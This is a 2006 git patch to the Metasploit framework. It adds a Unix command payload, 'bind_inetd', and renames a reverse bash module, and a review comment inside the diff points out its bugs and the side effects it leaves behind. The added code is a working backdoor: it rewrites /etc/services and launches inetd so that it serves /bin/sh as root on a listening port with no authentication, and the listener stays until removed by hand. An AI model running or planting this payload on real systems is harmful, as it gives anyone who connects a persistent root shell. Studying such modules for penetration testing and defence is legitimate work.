From 75a0aa2e760f8aa44f28d2cb41d77f3924c978e5 Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Sun, 15 Jan 2006 21:13:41 +0000
Subject: [PATCH] Bind added, reverse fixed module name
git-svn-id: file:///home/svn/incoming/trunk@3373 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../payloads/singles/cmd/unix/bind_inetd.rb | 76 +++++++++++++++++++
 .../payloads/singles/cmd/unix/reverse_bash.rb | 2 +-
 2 files changed, 77 insertions(+), 1 deletion(-)
 create mode 100644 modules/payloads/singles/cmd/unix/bind_inetd.rb
diff --git a/modules/payloads/singles/cmd/unix/bind_inetd.rb b/modules/payloads/singles/cmd/unix/bind_inetd.rb
new file mode 100644
index 0000000000..f44ff1a3cc
--- /dev/null
+++ b/modules/payloads/singles/cmd/unix/bind_inetd.rb
@@ -0,0 +1,76 @@
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+
+module Msf
+module Payloads
+module Singles
+module Cmd
+module Unix
+
+module BindInetd
+
+ include Msf::Payload::Single
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'Unix Command Shell, Bind TCP (inetd)',
+ 'Version' => '$Revision$',
+ 'Description' => 'Listen for a connection and spawn a command shell (persistent)',
+ 'Author' => 'hdm',
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Handler' => Msf::Handler::BindTcp,
+ 'Session' => Msf::Sessions::CommandShell,
+ 'PayloadType' => 'cmd',
+ 'Payload' =>
+ {
+ 'Offsets' => { },
+ 'Payload' => ''
+ }
+ ))
+ end
+
+ #
+ # Constructs the payload
+ #
+ def generate
+ return super + command_string
+ end
+
+ #
+ # Returns the command string to use for execution
+ #
+ def command_string
+ tmp = "/tmp/.msf_inetd" + $$.to_s
+ cmd =
+ # Create a clean copy of the services file
+ "grep -v msfbind /etc/services>#{tmp};" +
+
+ # Add our service to it
+ "echo msfbind #{datastore['LPORT']}/tcp>>#{tmp};" +
+
+ # Overwrite the services file with our new version
+ "cp #{tmp} /etc/services;" +
+
+ # Create our inetd configuration file with our service
+ "echo msfbind stream tcp nowait root /bin/sh sh>#{tmp};" +
+
+ # First we try executing inetd without the full path
+ "inetd -s #{tmp} ||" +
+
+ # Next try the standard inetd path on Linux, Solaris, BSD
+ "/usr/sbin/inetd -s #{tmp} ||" +
+
+ # Next try the Irix inetd path
+ "/usr/etc/inetd -s #{tmp};"
+
+ # Delete our configuration file
+ "rm #{tmp};";
+
+ return cmd
+ end
+
+end
+
+end end end end end
diff --git a/modules/payloads/singles/cmd/unix/reverse_bash.rb b/modules/payloads/singles/cmd/unix/reverse_bash.rb
index 5fc56b7fdf..72619a1dbb 100644
--- a/modules/payloads/singles/cmd/unix/reverse_bash.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_bash.rb
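Review bot: In `command_string` the steps are joined with `;`, so if the `grep` or `echo` into `#{tmp}` fails (for example a full or read-only `/tmp`) the following `cp #{tmp} /etc/services;` still runs and can leave the tested host with a truncated services file and no backup. Chaining the first three commands with `&&` would stop before the overwrite. The module also leaves lasting state that the `'Description'` only hints at with "(persistent)": an `msfbind` line in `/etc/services` and an inetd instance serving `/bin/sh` as root on LPORT with no authentication; a header comment such as `# Side effects: adds an "msfbind" entry to /etc/services and leaves a root inetd listener on LPORT; both stay until removed by hand` would tell operators what to revert and defenders what to look for. The line `"/usr/etc/inetd -s #{tmp};"` appears to lack the trailing `+` the earlier steps have (the hunk's 76-line count fits that reading), in which case `"rm #{tmp};"` is a separate, discarded statement and the `/tmp/.msf_inetd<pid>` file is left behind as well; worth confirming against the file.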
@@ -8,7 +8,7 @@ module Singles
 module Cmd
 module Unix
-module Reverse
+module ReverseBash
 include Msf::Payload::Single